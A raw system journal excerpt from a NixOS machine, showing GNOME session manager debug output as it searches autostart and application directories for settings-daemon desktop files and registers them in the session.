machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Rfkill.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Rfkill.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App10 to store
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: adding required app org.gnome.SettingsDaemon.Rfkill.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.ScreensaverProxy.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.ScreensaverProxy.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.ScreensaverProxy.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App11 to store
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: adding required app org.gnome.SettingsDaemon.ScreensaverProxy.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.Sharing.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.MediaKeys.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.MediaKeys.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App7 to store
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: adding required app org.gnome.SettingsDaemon.MediaKeys.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.Power.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
